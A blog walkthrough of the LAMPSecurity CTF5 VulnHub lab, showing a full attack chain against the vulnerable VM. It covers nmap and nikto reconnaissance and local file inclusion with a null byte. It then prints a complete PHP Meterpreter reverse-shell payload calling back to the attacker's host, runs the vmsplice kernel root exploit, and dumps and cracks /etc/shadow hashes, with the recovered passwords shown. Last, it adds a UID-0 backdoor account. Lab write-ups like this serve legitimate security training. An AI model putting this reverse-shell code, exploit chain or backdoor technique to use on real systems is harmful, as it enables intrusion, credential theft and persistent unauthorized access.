Sunday, November 1, 2015

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :
root@kali:~/vulhub/ctf5# nmap-sT192.168.56.1-254
Starting Nmap6.47 ( http://nmap.org) at 2015-10-31 00:22 GMT
Nmapscan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcpopen mysql
MAC Address: 08:00:27:C3:02:2B (CadmusComputer Systems)


Nmapscan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcpopen ssh
80/tcpopen http

Nmapdone: 254 IPaddresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

  • Webserver
  • Mail (IMAP,POP)
  • NFS, Portmapper
  • netbios
  • samba
  • mysql


Assessing the webserver:
Open the link in browser (http://192.168.56.101)

It gives us a default linux apache page :






just tried giving different paths

e.g. index.php... gives below :




When I click blog I get :



When I go back and click contact :



Go back and click Events



Now we see this has different webappsinstalled.

Now on the blogpage, clicking on the links on the navigation pane, I have got below :Webmail




Admin Login





Vulnerability Assessment and Exploit :

Squirrelmailversion had 2 found vulnerabilities :
root@kali:/var/www# searchsploitsquirrel |grep1.4.x
SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability | /php/webapps/27948.txt

Tried them :
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability :



SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

No lets run Niktoto see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto-h http://192.168.56.101

- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjackingX-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHPinclude error may indicate local or remote file inclusion is possible.

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdminis for managing MySQLdatabases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMailfound
+ OSVDB-3233: /info.php: PHPis installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodesvia ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFIfrom RSnake'slist (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmindirectory found

+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we got some more vectors.

Trying the below paths one by one :
/index.php?page=../../../../../../../../../../etc/passwd << As per nikto, no luck





We removed the path and saw what comes up, if we see above it shows that it is also adding a .phpas suffix, so we need to add "" which is a nullbyteand terminate the addition of php

Now keep adding ../etc/passwd till we get some results


Bang, we see LFIsuccessful.

Now we try to fetch some more information e.g. mysql:



[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1 [mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :




Another vector was the Nanocms




Using Google :



http://www.securityfocus.com/bid/34508/exploit

When we try this :





For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :





Now lets try to access the portal :We managed to login to the admin panel




Now we see that we have an option to create a new page using the adminpanel

My steps would be :

1- Create a phppayload on my KALI host
2- Create a page on NanoCMSand copy the code on the nanocms
3- Open a handler on my KALI host
4- Open the shellcodepage
5- We should get our meterpreteron our KALI host

Lets try it now.


Step 1 :

root@kali:/var/www# msfpayloadphp/meterpreter/reverse_tcpLHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayloadis deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenominstead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOSTbefore sending
# it to the victim.
$ip= '192.168.56.110';
$port = 4444;
$ipf= AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip= "[". $ip."]";
$ipf= AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif(($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif(($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len= fread($s, 4); break;
case 'socket': $len= socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len= $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :




Step 3:msfexploit(udev_netlink) > use exploit/multi/handler
msfexploit(handler) > set LPORT4444
LPORT=> 4444
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:





Step 5:msfexploit(handler) > exploit 
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpretersession 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter> sysinfo
Computer : localhost.localdomain
OS :Linux localhost.localdomain2.6.23.1-42.fc8#1 SMPTue Oct 30 13:55:12 EDT 2007 i686
Meterpreter: php/php

meterpreter> getuid
Server username: apache (48)
meterpreter> getpid
Current pid: 6464


We have a shell now

However we are in with apache user. We need to attempt an privilege escalation


Now steps I will try :

Step 1 : As I am on KALI linux, will search for PE exploits locally first
root@kali:~/vulhub/ctf5# searchsploit2.6.23 local linux
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Description | Path
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6.23 <= 2.6.24 - vmspliceLocal Root Exploit | /linux/local/5093.c
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Step 2 : Will compile the binary
root@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp/usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc5093.c -o 5093

Step 3 : Transfer the file to the victim from the meterpreter
meterpreter> lcdvulhub
meterpreter> lcdctf5
meterpreter> lpwd
/root/vulhub/ctf5
meterpreter> upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shell
Process 13468 created.
Channel 2 created.

cd/tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod+x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
root
WE ARE ROOT NOW !!

Post Exploit:

bash-3.2# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:RpcbindDaemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrentSeed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAPServer:/var/lib/imap:/bin/bash


bash-3.2# cat shadow
root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd/homebash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issueFedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-release
Fedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr08:00:27:C3:02:2B
inetaddr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inetaddr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACKRUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomainlocalhostlocalhost
::1 localhost6.localdomain6 localhost6


Lets crack the password now: 

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer- johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root using John seems tedious, lets use hashcatfor this purpose and try..

root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
root@kali:~/vulhub/ctf5# hashcat-m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcatwill expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcatv0.49 with 1 threads and 32mbsegment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015


So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost~]# whoami
root
[root@localhost~]# 



Creating a backdooruser with root privileges :bash-3.2# useradd-ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd|grepjohn
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passed johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :

root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost~]#


1 comment:

  1. Good day. I was impressed with your article. Keep it up . You can also visit my site if you have time. Thank you and Bless you always.

    cyber security penetration testing courses

    ReplyDelete

The Azure Synapse Resource Provider Error

  If you are get the error " The Azure Synapse resource provider (Microsoft.Synapse) needs to be registered with the selected subscript...